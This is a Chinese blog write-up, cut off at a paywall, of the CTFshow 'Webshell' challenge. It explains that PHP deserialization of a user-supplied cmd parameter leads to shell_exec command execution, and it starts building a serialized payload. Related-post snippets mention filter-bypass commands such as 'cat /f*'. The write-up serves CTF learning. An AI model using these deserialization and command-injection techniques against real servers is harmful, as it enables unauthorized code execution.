CTFSHOW 菜狗杯 Webshell 解题思路和方法

已于 2024-06-14 21:09:32 修改
阅读量806 收藏 5
点赞数 2
分类专栏: CTFshow CTF 网络安全 文章标签: 网络安全
于 2024-06-14 18:15:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58052886/article/details/139687310
版权

点击链接,发现php代码,看到其中使用了反序列化操作,那么该题考察的点很有可能是序列化反序列化:

分析代码,我们输入的参数名为 cmd,同时将传入的参数值首先进行反序列化操作,然后执行 init() 函数。在init中代码主要作用就是执行cmd的值。此时我们可以在构造反序列化语句中使用cmd命令。

将Webshell类拷贝出来,对其进行实例化,然后对类中的cmd变量进行赋值操作,然后运行:

<?php
class Webshell {
        public $cmd = 'echo "Hello World!"';

        public function __construct() {
            $this->init();
        }

        public function init() {
            if (!preg_match('/flag/i', $this->cmd)) {
                $this->exec($this->cmd);
            }
        }

        public function exec($cmd) {
            $result = shell_exec($cmd);
            echo $result;
        }
    } 
$ws =new Webshell() ;
$ws->cmd = "ls" ;
echo seriali
最低0.47元/天 解锁文章
CTFshow--misc(1-6)
qq_47804678的博客
11-25 5484
从标题看起来这个题就不仅仅会使用一种隐写方式了,不要慌,起码他是个能正常打开的图了;发现得到的数据并没有什么特征,那应该就不是了。
ctfshow——web(持续更新)
qq_55202378的博客
10-27 763
查看源代码: base64编码特征:大小写+数字,偶尔最后几位是=。登录界面,先测一下是不是存在SQL注入漏洞 SQL注入常见的测试方法就是:再用sqlmap去跑数据库里的内容:(这里直接跑数据包) 看到函数,这一题应该是与文件包含有关。是包含GET传参中url参数的值,那么可以考虑php伪协议中的input协议data协议。 关于php://inputdata://text/plain,简单来说:故,poc:
【CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
jayq1的博客
06-03 6322
文件上传漏洞学习笔记,ctfshow题目为依托
【BUUCTF杂项题】后门查杀、webshell后门
Power的博客
02-04 505
webshell 病毒查杀 MD5编码
CTFSHOW_Webshell
qq_48932191的博客
01-20 652
Webshell类复制出来,然后改一下要运行的cmd。这里因为题中过滤了flag所以用通配符“*”替代。反序列化,输入字符串经过反序列化实现命令执行。
ctfshowwebshell wp
arcuied
12-11 879
ctfshowwebshell wp
ctfshow web webshell
hypocrite2的博客
05-18 701
Webshell是一种恶意脚本,可以上传到Web服务器上,以获取未经授权的访问对服务器的控制。如果通过GET请求传递了名为 cmd 的参数,代码将尝试对参数进行反序列化,并调用 $unserializecmd->init() 方法。否则,代码将显示自身的源代码。如果条件为真,则调用 exec() 方法,传递 $cmd 的值。了解到它的格式,字母O,8位,“Webshell”,1,s,3位,cmd,s,位数,“真正想执行的命令”__construct() 方法是类的构造函数,它调用 init() 方法
CTFSHOW --WEB
weixin_45908624的博客
01-09 4189
CTFShow----web
ctfshowwebshell
02-28
### CTFShow WebShell 题目解题思路 在处理CTFShow中的WebShell题目时,理解服务器端文件包含漏洞(LFI/RFI)、命令执行以及如何上传并操作WebShell至关重要。通常情况下,在PHP环境中,`include()`、...
ctfshow112
03-10
- **解题思路**:可参考《最新CTFShow web1-7》等解析文章,学习漏洞利用渗透测试技巧[^2]。 - **社区与教程**: - **GitHub**:搜索 `CTFShow` 可找到开源题目仓库 Writeup。 - **知乎/B站**:有用户分享...
ctfshow web168
最新发布
03-18
</think>### CTFShow Web168 解题思路 #### 关键考点分析 1. **文件上传漏洞**:题目可能涉及绕过文件上传校验机制,上传恶意文件(如Webshell)[^1]。 2. **校验机制绕过**:需分析前端/后端校验规则(如扩展名黑...
ctfshow(
qq_62046696的博客
11-28 6554
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收postget请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFSHOW-WEB详解
qq_49422880的博客
05-25 5033
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
CTFshow web方向 全
Jay17的博客
09-01 5037
CTFshow web方向 全
CTFshow 2022 部分WEB WP
starttv的博客
11-13 1900
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
CTFshow 2022 WEB WP补充
starttv的博客
11-14 2187
得到源码,分析发现push会将自定义内容md5加密之后作为文件名上传到/plugins/目录上,内容可控。先给number2赋字母,会出现一个报错界面,给number1operator赋的话会提示错误,应该是这两个参数有过滤,而number2没有。在控制台输入Game回车,把score修改,然后回到游戏点击开始,只要吃掉一个苹果你就会发现分数已经修改成功。分析源码,发现它将文件名拼接到了cmd里,没有进行任何过滤,可以在文件后传入命令。flag=0,发现内容为空,尝试把flag=0改为1,得到。
CTF利用大佬们的webshell拿取flag
Javachichi的博客
04-27 845
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这份完整版的网络安全(黑客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接即可前往获取【保证100%免费】。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。学习黑客常用的开发软件都在这里了,给大家节省了很多时间。比较早的一场CTF了,做了几个web。而upload最为显著了,发现存在目录遍历。
CTFSHOW——
asmartrman的博客
02-19 1743
CTFSHOW——题解(更新中)
CTF秀--
m0_59022585的博客
07-09 4947
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值